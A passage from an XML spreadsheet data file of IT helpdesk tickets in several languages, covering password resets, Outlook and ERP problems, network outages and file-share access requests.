    <s v="_x000a__x000a_received from: zywoxerf.paqxtrfk@gmail.com_x000a__x000a_dear sir:_x000a_i have two issues:_x000a__x000a_1)      on my kpm,   (i) my time keep does not go forward, (ii) i submitted my time report for last week but my supervisor does not receive it, and (iii) my time keeping window, only showing one row._x000a__x000a_2)      on my e-time, i cannot enter a new vacation time_x000a__x000a__x000a__x000a_x.  dathniel  fangtry_x000a_senior staff engineer_x000a__x000a_"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to see engineering_tool "/>
    <s v="unable to see engineering_tool "/>
    <s v="jgxclrzp jzeantui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need file pulled from the backup - h:\manufacturing\backorder database openorderbook_v7g_rev.accdb "/>
    <s v="current file is corrupt and not working_x000d__x000a_server name-dat1-HostName_1326 "/>
    <s v="eirkpyfv zdipasul"/>
    <x v="11"/>
  </r>
  <r>
    <s v="wifi companysecure not working at sao bernardo do campo"/>
    <s v="iwifi companysecure not working at sao bernardo do campo"/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="call came and got disconnected._x000d__x000a_private number was unable to call."/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call "/>
    <s v="blank call "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lockout"/>
    <s v="account lockout"/>
    <s v="nfhaople pywbcozt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to post delivery 8058337294"/>
    <s v="get the attached error when trying to post delivery 9169448305. "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="43"/>
  </r>
  <r>
    <s v="skype addin disabled"/>
    <s v="name:pfzxecbo ptygkvzl_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:pfzxecbo.ptygkvzl@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i can not add a skype meeting link to a new meeting notice.  the button is no longer there.  please advise how to get it back."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="geylvotd msadrzkj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uninstalling driver update // slimware technologies // external software"/>
    <s v="uninstalling driver update // slimware technologies // external software"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="venue 11 pro 7130 vpro 2 - detachable keybankrd is having severe issues.."/>
    <s v="hello,_x000d__x000a__x000d__x000a_please send me a replacement detachable keybankrd for my &quot;venue 11 pro 7130 vpro&quot;._x000d__x000a__x000d__x000a_the right hand keys are not working/not working properly._x000d__x000a__x000d__x000a_it makes using the machine very problematic._x000d__x000a_"/>
    <s v="dxwuovgs lmuxizht"/>
    <x v="2"/>
  </r>
  <r>
    <s v="lost access to mii scanning"/>
    <s v="name : tim hopes_x000a_email : dkxlpvnr.narxcgjh@gmail.com_x000a_telephone : _x000a_summary : two employee's lost access to mii scanning.  clock numbers 20905675 and 65941543."/>
    <s v="dkxlpvnr narxcgjh"/>
    <x v="40"/>
  </r>
  <r>
    <s v="odbc-fehler - systemfehler 126: das angegebene modul wurde nicht gefunden. treiber nicht geladen"/>
    <s v="ich mÃ¶chte einen serienbrief erstellen, kann aber meine datenquelle (excelliste) nicht Ã¶ffnen?_x000d__x000a_ïƒ¨ systemfehler 126 ??? ich bitte um hilfe! danke._x000d__x000a_"/>
    <s v="upiyobvj lwohuizr"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to connect to internet"/>
    <s v="unable to connect to internet"/>
    <s v="wjslkzfr jxlbzwrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system freezing "/>
    <s v="system freezing "/>
    <s v="bihypqsn kbaegpcd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp login issue, password reset"/>
    <s v="erp login issue, password reset"/>
    <s v="wbilvncd idavhsxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: company-na-usa-usa-eh-2811-mpls-rtr01 located at usa company is down since 8.36am et on 10/18."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___8.36am et on 10/18_____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global_telecom_1(# 000000223172498)____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="gfjqrsxz bcyhezsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for rzxfgmcu xprwayoc on other / impact award"/>
    <s v="please unlock my password. i forgot it._x000d__x000a_"/>
    <s v="rzxfgmcu xprwayoc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue : not loading "/>
    <s v="outlook issue : not loading "/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please redirect to local it: word document 134257.doc broken"/>
    <s v="das folgende word-dokument kann nicht mehr bearbeitet werden: \\edksm003\qs\zeugnis_kunden\134\134257\134257.doc (der cursor springt stÃ¤ndig auf seite 11)."/>
    <s v="cwtrgeup nxctkmzo"/>
    <x v="48"/>
  </r>
  <r>
    <s v="reset passwords for wvdxnkhf jirecvta using password_management_tool password reset."/>
    <s v="the"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="16"/>
  </r>
  <r>
    <s v="scheduled job needs canceled"/>
    <s v="_x000a__x000a_received from: bwfhtumx.japznrvb@gmail.com_x000a__x000a_there is a job that had been printing out every morning on bd18.  i need it cancelled.  this is the one that printed today.  if you look at tomorrow's date, you can see there is one released that will proint._x000a__x000a_[cid:image001.jpg@01d22914.f4adc7c0]_x000a__x000a_bwfhtumx japznrvb_x000a_ regional controller_x000a_bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="4"/>
  </r>
  <r>
    <s v="fc for eweausbildung for jannek hÃ¼ndling"/>
    <s v="hallo,_x000a__x000a_bitte fÃ¼r jannek hÃ¼ndling zugriff auf den ordner department / ausbildung._x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fdyietau dvsyxwbu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="engineering tool will not work"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wlsazrce.uwehsqbk@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i cannot open, close, or manipulate any of my tasks on engineering tool.  this makes it difficult to work with our team in india.  please have a look._x000d__x000a__x000d__x000a_"/>
    <s v="wlsazrce uwehsqbk"/>
    <x v="25"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp und EU_tool geht sehr langsam"/>
    <s v="EU_tool funktioniert teilweise gar nicht"/>
    <s v="efjzbtcm mdpviqbf"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp complete system very slow"/>
    <s v="erp SID_34 system in germany is extremly slow  no delivery possilbe please help "/>
    <s v="cwrikael oanmsecr"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp logon"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xaertwdh.kcsagvpy@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a_please assist, changed password this morning. entered old password just now. please activate?_x000d__x000a__x000d__x000a_kind "/>
    <s v="epAYsqnX RAkuDnXG"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account unlock"/>
    <s v="windows account unlock"/>
    <s v="emtwgzxh sgkrzinp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="mqxkanzt xryzfhpe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password"/>
    <s v="reset password"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp reagiert extrem langsam"/>
    <s v="transaktionen in erp dauern zu lange"/>
    <s v="hbcejwsz cejsmdpf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor fÃ¼r video messmaschine liefern \oziflwma nhgvmqdl"/>
    <s v="monitor fÃ¼r video messmaschine liefern \oziflwma nhgvmqdl"/>
    <s v="vrfpyjwi nzhvgqiw"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit outlook \cwivnxuk izmxqfud"/>
    <s v="probleme mit outlook \cwivnxuk izmxqfud"/>
    <s v="cwivnxuk izmxqfud"/>
    <x v="24"/>
  </r>
  <r>
    <s v="rechner optiplex790 defekt \ ewew8323670 \xpugntjv zcaermdt"/>
    <s v="rechner optiplex790 defekt \ ewew8323670 \xpugntjv zcaermdt"/>
    <s v="xpugntjv zcaermdt"/>
    <x v="24"/>
  </r>
  <r>
    <s v="engineering tool is not working..."/>
    <s v="error: you are not authorized to view this page_x000d__x000a_you do not have permission to view this directory or page using the credentials that you supplied. &quot;"/>
    <s v="aunkpchr qsyvrmjl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="outlook does not start anymore"/>
    <s v="after clicking the outlook icon, the start window appears for minutes. _x000d__x000a_no matheywter how long you wait, the programdnty does not start. _x000d__x000a_also a restart of the computer brought no improvement"/>
    <s v="ebldwvth qzsfkyuw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="res: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms"/>
    <s v="_x000a__x000a_received from: qasdhyzm.yuglsrwx@gmail.com_x000a__x000a_fyi_x000a__x000a_qasdhyzm yuglsrwx_x000a_analyst, distributed system lan/pc_x000a_qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;_x000a__x000a_de: qasdhyzm yuglsrwx_x000a_enviada em: terÃ§a-feira, 18 de outubro de 2016 08:20_x000a_para:  &lt;ongumpdz.pjkrfmbc@gmail.com&gt;_x000a_cc: 'ferguss - gustaco filipim requena hp' &lt;gustathsvo@gmail.com.br&gt;_x000a_assunto: res: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms_x000a__x000a_hi ,_x000a__x000a_we are waiting you, i'm available and gustavo too, i believe that you need connect in computer the gustathsvo (non-company) to solve this problem, can you connect in computer the gustathsvo now? or can be 4:00pm (ist)._x000a__x000a_if you can streamline this process i appreciate, because gustathsvo has this problem by 2 weeks._x000a__x000a__x000a_qasdhyzm yuglsrwx_x000a_analyst, distributed system c_x000a_qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;_x000a__x000a_de: _x000a_enviada em: terÃ§a-feira, 18 de outubro de 2016 03:06_x000a_para: qasdhyzm yuglsrwx &lt;qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;&gt;_x000a_assunto: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms_x000a__x000a_hi ,_x000a__x000a_can you please come up with your availability aerp. it would be great if you could mention the date and time (ist) . :)_x000a_please give me a call if you could not reach out to me via skype._x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="network outage: company-russia-ups-vpn-rtr.company.com located at russia warehouse is down since 5:09 am et on 10/18."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ______no___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____5:09 am et on 10/18____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__na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x v="7"/>
  </r>
  <r>
    <s v="EU_tool is down in plant germany"/>
    <s v="please restart the EU_tool server aerp, so we can run production as planned"/>
    <s v="qmhikdzl zatcorjd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="create business partner id - vvtathadnda1"/>
    <s v="_x000a__x000a_received from: rtpcnyhq.ceqmwkhi@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please create a business partner id for vvtathadnda1 in solution manager._x000a__x000a_rtpcnyhq ceqmwkhi_x000a__x000a_rtpcnyhq.ceqmwkhi@gmail.com&lt;mailto:rtpcnyhq.ceqmwkhi@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="rtpcnyhq ceqmwkhi"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/18/2016 04:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/18/2016 04:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to loin to ess portable "/>
    <s v="unable to loin to ess portable "/>
    <s v="makypvlb vslirqhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="multiple app problems, user jesjnlyenmrest34"/>
    <s v="_x000a__x000a_received from: vogtfyne.isugmpcn@gmail.com_x000a__x000a_hello,_x000a_user gkzedilm.tkpfumeb@gmail.com&lt;mailto:gkzedilm.tkpfumeb@gmail.com&gt; [jesjnlyenmrest34]  is experiencing programdnty issues with these aplications:_x000a__x000a_engineering_tool â€“ he can access it, create new report, unable to submit_x000a__x000a_the computers are approximately one year old, should i rather reinstall this pc instead of trying to fix the problems separatelly?_x000a__x000a__x000a_best "/>
    <s v="gkzedilm tkpfumeb"/>
    <x v="25"/>
  </r>
  <r>
    <s v="setup EU_tool \we_wu185 \8323738 \jionmpsf wnkpzcmv"/>
    <s v="setup EU_tool \we_wu185 \8323738 \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="fc for HostName_717\sk-leitung for user mokolthrl12a"/>
    <s v="hallo ,_x000a__x000a_bitte lese- u. schreibberechtigung fÃ¼r niptbwdq csenjruz einrichten. ist mit sbtvploj mwtrouyl besprochen._x000a__x000a_gruÃŸ_x000a__x000a_lhmxposv lnpgjhus_x000a_betriebsabteilungsleiter technische dienste_x000a_lhmxposv.lnpgjhus@gmail.com_x000a__x000a__x000a_geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a_sitz/registered office: germany - registergerirtcht/listed in the court register: germany_x000a_persÃ¶nlich haftende gesellschafterin/general partner: company company beteiligungs gmbh_x000a_sitz/registered office: fÃ¼rth/bay. - registergerirtcht/listed in the court regster: fÃ¼rth_x000a__x000a_von: niptbwdq csenjruz _x000a_gesendet: montag, 17. oktober 2016 12:07_x000a_an: jionmpsf wnkpzcmv; xmlbfjpg yegzbvru; dhoalycb yopvwrjq; lhmxposv lnpgjhus; sbtvploj mwtrouyl; joerg passiep; cwryvksu cedsairg_x000a_betreff: aw: maschinenumstellung_x000a__x000a_bei mir klappt es nicht._x000a__x000a_ _x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_niptbwdq csenjruz_x000a_servicecenter instandhaltung_x000a_niptbwdq.csenjruz@gmail.com_x000a_"/>
    <s v="lhmxposv lnpgjhus"/>
    <x v="11"/>
  </r>
  <r>
    <s v="insert to d/n no."/>
    <s v="please insert the delivery note no. in erp book."/>
    <s v="cthaborg cahbxlmr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="purchase order print"/>
    <s v="dear all_x000a__x000a_this is jathyrsy from plant_69._x000a_we are on the audit and the auditor would like to see po documents(hard copy)._x000a_is there any way to print po documents one time ?_x000a_if i ues me23n and zz_mails, i need to do one by one. the number of pos is more than 200._x000a_"/>
    <s v="gkwcxzum answkqpe"/>
    <x v="29"/>
  </r>
  <r>
    <s v="network outage: company-na-usa-usa-township-dmvpn-1921-rtr01 since 2:59 am et on  10/18."/>
    <s v="what type of outage:  _  x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __2:59 am et on  10/18.____________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _no___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__no____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _ na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x v="7"/>
  </r>
  <r>
    <s v="outlook 2010 - 64 bit - prompts for password repeatedly after a password reset"/>
    <s v="we are downloading the sp2 for outlook and will see if the issue is resolved once it is installed."/>
    <s v="thrmnwjf sxzkeymq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte das iphone-6 001 freischalten fÃ¼r mail-empfang."/>
    <s v="_x000a__x000a_received from: rtnyumbg.yzemkhbq@gmail.com_x000a__x000a_hallo zusammen,_x000a_bitte das iphone-6 001 freischalten fÃ¼r mail-empfang._x000a_danke_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a_rtnyumbg yzemkhbq / tel_x000a__x000a__x000a_[cid:image001.jpg@01d22919.634da5c0]_x000a__x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_rtnyumbg yzemkhbq_x000a__x000a_techn. beratung und verkauf_x000a_rtnyumbg.yzemkhbq@gmail.com&lt;mailto:rtnyumbg.yzemkhbq@gmail.com&gt;_x000a_company deutschland gmbh_x000a_max-planck-straÃŸe 13&lt;x-apple-data-detectors://1&gt;_x000a_&lt;x-apple-data-detectors://1&gt;_x000a__x000a_company deutschland gmbh_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, harald mÃ¤nnlein, herr pinkow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_x000a_select the following link to view the disclaimer in an alternate language. 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rtnyumbg yzemkhbq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you please unlock and reset password for userid bertes34 and let me know the initial password"/>
    <s v="can you please unlock and reset password for userid bertes34 and let me know the initial password"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help to open .rar file."/>
    <s v="user needs help to open .rar file._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-installed the application on the user system._x000d__x000a_-user informed he is able to open the .rar files now._x000d__x000a_-issue resolved."/>
    <s v="ufvprezt soqlikch"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”µè¯æœºæ²¡æœ‰å£°éŸ³"/>
    <s v="ç”µè¯æœºæ²¡æœ‰å£°éŸ³"/>
    <s v="cyjlqdwm kywiuosn"/>
    <x v="30"/>
  </r>
  <r>
    <s v="media server disconnect lpapr952(south_amerirtca  south_amerirtca)"/>
    <s v="received below email from inin tried to ping the server but it is not responding._x000a__x000a_from: cthaasnoc@gmail.com _x000a_sent: monday, october 17, 2016 11:34 pm_x000a_to: _x000a_subject: media server disconnect_x000a__x000a_ _x000a__x000a__x000a__x000a_october 17, 2016_x000a_company inc.,_x000a_the cthaasnoc network operations center (noc) has received a media server disconnect alert via proactive monitoring for the following media server(s). we have opened an incident to track this alert and will close the incident when connectivity is re-established to the media server. please verify power to all devices and/or follow up with your network provider for further troubleshooting._x000a_affected infrastructure_x000a_server: den157gic064 - 78.39.157.64, location: , united states_x000a_ind157gic064 - 78.38.157.64, location: , united states_x000a_ind157gic064 - 78.38.157.64, location: , united states_x000a_den157gic064 - 78.39.157.64, location: , united states_x000a_den157gic064 - 78.39.157.64, location: , united states_x000a_den157gic064 - 78.39.157.64, location: , united states_x000a_den157gic064 - 78.39.157.64, location: , united states_x000a_den157gic064 - 78.39.157.64, location: , united states_x000a_additional information_x000a_trghwyng route to lpapr952 [10.34.160.12]_x000a_over a maximum of 30 hops:_x000a__x000a_sartlgeo lhqksbdx ms &lt;1 ms &lt;1 ms 21.97.98.46829_x000a_2 &lt;1 ms &lt;1 ms &lt;1 ms 21.97.98.468_x000a_3 4 ms 9 ms 3 ms 10.20.2.70_x000a_4 158 ms 157 ms 157 ms 10.42.1.82_x000a_5 168 ms 168 ms 168 ms 10.42.1.81_x000a_6 169 ms 168 ms * 79.67.01.659_x000a_7 * * * request timed out._x000a_8 * * * request timed out._x000a_9 * * * request timed out._x000a_10 * * * request timed out._x000a__x000a_ _x000a_if you have any questions regarding this notification please contact our support team at the number listed below._x000a__x000a_sincerely,_x000a_interactive intelligence cthaasnoc team_x000a_interactive intelligence blast notification _x000a_  _x000a_this mailbox is not monitored.please call support at the phone number in this communication for any questions you may have._x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to access business_client"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ntuhoafg.bzwefjvk@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am not able to access business_client, please help._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system bankrd temperature alerts in monitoring_tool for south_amerirtca  south_amerirtca servers HostName_1238 &amp; HostName_1237"/>
    <s v="system bankrd inlet temp  alert for HostName_1237_x000d__x000a_system bankrd ambient temp alert for lpas060._x000d__x000a__x000d__x000a_attached is the screen shot of windows event viewer logs"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp SID_34 password  sign on is cabane please reset to daypay3  thank you"/>
    <s v="name:fyzceglp vfnraqxc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:fyzceglp.vfnraqxc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i have another user that can't remember his erp SID_34 password  sign on is cabane please reset to daypay3  "/>
    <s v="fyzceglp vfnraqxc"/>
    <x v="0"/>
  </r>
  <r>
    <s v=":user pluytd54 ( erthryika plaunyud ) locked herself out of erp SID_34 - can you please reset her password to daypay3?  thank you"/>
    <s v="name:fyzceglp vfnraqxc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:fyzceglp.vfnraqxc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:user pluytd54 ( erthryika plaunyud ) locked herself out of erp SID_34 - can you please reset her password to daypay3?  "/>
    <s v="fyzceglp vfnraqxc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for pxvjczdt kizsjfpq using password_management_tool password reset."/>
    <s v="the"/>
    <s v="pxvjczdt kizsjfpq"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to access emails on outlook "/>
    <s v="unable to access emails on outlook "/>
    <s v="xmunoklw bnmswalv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp did not pull the customer part number from the ztax item for the taps item "/>
    <s v="hello it-team,_x000d__x000a__x000d__x000a_please help to check the following issue â€“ erp did not pull the customer part number from the ztax item for the taps item â€“ although it was shown on the delivery note (please see attached) we were not able to print the label for item 22:_x000d__x000a__x000d__x000a_"/>
    <s v="bswlorek yhdrlgbs"/>
    <x v="12"/>
  </r>
  <r>
    <s v="not able to login to collaboration_platform "/>
    <s v="not able to login to collaboration_platform"/>
    <s v="wsxhlagq rqejbwfu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0448767"/>
    <s v="ticket update on ticket_no0448767"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="action could not be performed"/>
    <s v="henvrkuo nogrfadw is getting the following error message when trying to access purchasing:_x000d__x000a_&quot;no data found for employee '1111102236'; inform system administration.&quot;_x000d__x000a__x000d__x000a_please sync her hr org details to purchasing. "/>
    <s v="mpihysnw wrctgoan"/>
    <x v="29"/>
  </r>
  <r>
    <s v="i would like to be able to use the camera on my skype for business calls.  can you add this to my options?"/>
    <s v="if this option is currently available, please let me know.  "/>
    <s v="yswgzvrc frjzcnsu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no audio on ethics page"/>
    <s v="no audio on ethics page"/>
    <s v="vyluaepi dtwfaejr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="intermittent audio issue on computer "/>
    <s v="intermittent audio issue on computer "/>
    <s v="ypetnhio ouhlpvig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook query "/>
    <s v="_x000a_summary:when logging in remotely, i am unable to access my outlook. i understand there is a setting i need to change to fix the issue. please help! "/>
    <s v="xmunoklw bnmswalv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1559962 - ticket update"/>
    <s v="inc1559962 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hpqc uacyltoe hxgaycze client login error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_when i try to login, the following message is received.  please advise._x000d__x000a__x000d__x000a_[cid:image001.png@01d2287e.88fe6750]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket query on ticket_no1559208 "/>
    <s v="ticket query on ticket_no1559208 "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_i am unable to log into skype.  please advise._x000d__x000a__x000d__x000a_[cid:image001.png@01d2287a.e58a4150]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor on x-ray instrument pc will not stay turned on."/>
    <s v="monitor on x-ray instrument pc will not stay turned on."/>
    <s v="budighfl izbxvary"/>
    <x v="2"/>
  </r>
  <r>
    <s v="sever hqap101 has a hd failure light"/>
    <s v="sever hqap101 has a hd failure light, kindly create a ticket with the vendor."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="26"/>
  </r>
  <r>
    <s v="interaction id : 1064857564"/>
    <s v="static sound from telephony_software phones : id : 2175968675 "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plant_269 xerox workcentre 5335 - rr18 printer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000d__x000a__x000d__x000a_please advise the user login associated with this machine â€“ need to update the address book_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="need installation of msoffice 2010"/>
    <s v="need installation of msoffice 2010._x000d__x000a__x000d__x000a_user is a new joiner and she's unable to access msoffice 2013 as because she's having e1 license."/>
    <s v="jqhtkfsm xoehtbnl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="\\HostName_768\teams\rta full control access for rjodlbcf uorcpftk"/>
    <s v="\\HostName_768\teams\rta full control access for rjodlbcf uorcpftk"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="33"/>
  </r>
  <r>
    <s v="password reset rqeuest for SID_34 erp for fduinmtw yofhirjs (hixsodl)"/>
    <s v="_x000a_summary:i need to have a user id reset for SID_34 erp for fduinmtw yofhirjs (hixsodl)_x000a_please e-mail her once you have reset the password."/>
    <s v="idlupnzr nkxylwrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock password"/>
    <s v="_x000a__x000a_received from: bihfazru.bhjqvtzm@gmail.com_x000a__x000a_hello, i have 2 employees that has access to scan out production orders on saturday oct. 15, 2016 but do not have access today. could you check into this problem and let me know what to do? hydluapo qbgclmit 6593679 and eulsvchi rqflkeuc 6676678. they have tried to unlock everything in password_management_tool but no luck._x000a__x000a_cthryhris kovaddcth_x000a_production supervisor_x000a_bihfazru.bhjqvtzm@gmail.com&lt;mailto:bihfazru.bhjqvtzm@gmail.com&gt;_x000a__x000a_[cid:image003.jpg@01cfcb3e.29ec32f0]_x000a__x000a_"/>
    <s v="bihfazru bhjqvtzm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent lock out issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ksxjcvze.ognyetrp@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i can't go into vpn,_x000d__x000a_password should be not right.???!!!_x000d__x000a__x000d__x000a_please can you reset my password.  also for vpn_x000d__x000a__x000d__x000a_many "/>
    <s v="ksxjcvze ognyetrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the engineering tool is not installed properly"/>
    <s v="there are two different engineering tools installed on the 2-in1 tablet and neither of them work properly. when i click on a link it goes into a web based search, also when i click on the engineering tool icon it show an error &quot;cannnot continue the application is improperly formatheywted).  the other error that i get below is an example of the web based search when entering a new engineering_tool:_x000d__x000a_sorry, the page you were looking for does not exist or is not available. we performed a web search for &quot;http engineering data report server pages report viewer aspx report viewer pages report server&quot; and here's what we found. "/>
    <s v="ypetnhio ouhlpvig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 10/17/2016 12:06:00  "/>
